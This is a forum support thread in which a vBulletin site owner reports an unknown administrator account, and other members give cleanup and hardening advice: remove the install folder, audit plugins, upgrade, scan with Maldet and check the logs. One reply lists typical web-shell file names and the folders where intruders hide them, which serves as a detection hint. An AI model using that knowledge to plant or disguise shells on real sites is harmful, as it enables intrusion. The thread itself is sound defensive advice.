|
I've been hacked?
Hi, I logged onto today to see a random account i've never seen before with administrator. This is what he did
http://puu.sh/cYklR/820873f86e.png Can someone tell me how he got access or what he was doing once he was in. Thank you. Edit: /install directory has been deleted already. Edit: Version 4.1.5 (Latest version) |
Please post all of your active add-ons here.
We also need to know which vBulletin version you're using. |
Please read the following two blog posts:
http://www.vbulletin.com/forum/blogs...ve-been-hacked http://www.vbulletin.com/forum/blogs...vbulletin-site Also please see these recent security announcements: vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5 vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions What version of vB4 are you running? |
Quote:
By add-ons are you referring to products? If so http://puu.sh/cYmWF/5856b728c1.png |
Well first off, that version is outdated, and has unpatched security issues, you should be running the latest 4.2.2 at a minimum, or 4.2.3
Inferno shout is outdated, and most likely did not come from this site, I would ditch that and get a different shout, such as it's newer version, https://vborg.vbsupport.ru/showthread.php?t=236970 |
Alright, that looks fine.
Now: - Be sure the /install folder is not present on your vBulletin installation. - Check all of your active plugins, there shouldn't be any fishy plugins with odd names. - In your ACP go to Maintenance > Diagnostics > Suspect File Versions. Check if there are any weird files which were created recently on your server. - Change the password of all administrator/moderator accounts. - Protect your ACP with a plugin like this: https://vborg.vbsupport.ru/showthread.php?t=296383 Edit: vBulletin version is very outdated, update to the latest. |
Quote:
|
Also check your plugins, ACP --> Plugins & Products --> Plugin Manager and see it there are any unknown plugins running under vBulletin
|
Quote:
|
Quote:
|
Quote:
Also, i've searched the plugin manager. Everything seems to be normal. |
As I said in post #2, you need to follow the links.
Please read the following two blog posts: http://www.vbulletin.com/forum/blogs...ve-been-hacked http://www.vbulletin.com/forum/blogs...vbulletin-site Also please see these recent security announcements: vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5 vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions Make sure you do not skip over any steps. |
Quote:
|
Without having access to your ACP and access logs, we don't know how the person accessed your ACP.
|
There might, that is why you need to follow all the instructions in the blog posts, as well as ditch inferno.
|
Quote:
|
Quote:
|
Ahh one of the multiple admin, do import hackers - look for one or more shell scripts uploaded to your server. Sometimes in clientscript/ or /includes and be sure to check any sub-folders.
Are you running any nulled modifications? Inferno Shoutbox Revolutionized what's that? :p I'd submit a ticket and ask your hosting company to scan w/ whatever they have setup on their server be it Maldet (also referred to as Linux Malware Detect (LMD)) or similar but before warned some of these shell scripts are custom per site (depends on if you were worth their time) so Maldet and others do not always pick those up and the ONLY way to be sure is to go through all your folders by hand. *Some stuff will stick out like a sore thumb, same way they want to be pompous and instead if using legit names like Admin for the 5-6 spare accounts its always something cocky such as lolwut, lmao, amongst other names I've since long forgotten :cool: the point being most of its easily spotted (file names such as shell.php / sexy.php / lol.php and similar) but every so often they hide one or mores files very well w/ names that seem valid so be sure to use the Maintenance tools in admincp and do suspect files and other tips in the links Ozzy posted above. |
TBH it don't matter now how they got in, you need to plug the holes. First off by following all the instructions in the blog posts, then upgrade to at least 4.2.2
|
Alright, i'm going to back it up to yesterday and remove inferno shoutbox. Anything else?
|
Ok I remembered even more after I ran off to another thread so back to share! See my post here as this is a very similar situation and check for those plugins I listed or similar ones.
http://www.vbulletin.com/forum/forum...31#post4012531 |
I have 1 hour of spare time, you may PM me your Teamviewer information and I'll take a look for you.
|
Quote:
Follow the instructions, and upgrade to 4.2.2 If you decide to take the easy way out, you will just be hit again, as the site is now on their radar. |
It depends if that was indeed the hole and what he did while inside. An easy way to see exactly what he did is to look at your server logs.
|
The shout is most likely a old version that was re released by a hacking team, and I won't mention their name. :)
Also the vB version being run has un patched security issues, as does any version below 4.2.2 Another thing it could be the install directory was still in the root. Either way, the OP needs to follow the directions in the blog posts, then upgrade to 4.2.2 |
I know that hacking team only too well. :(
Yep, I agree to stick with the plan though I didn't read it. lol Was just saying to check server logs. it is one of the first things to do upon being hacked. :) |
| All times are GMT. The time now is 05:05 AM. |
Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
| X vBulletin 3.8.12 by vBS Debug Information | |
|---|---|
|
|
 More Information |
|
|
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|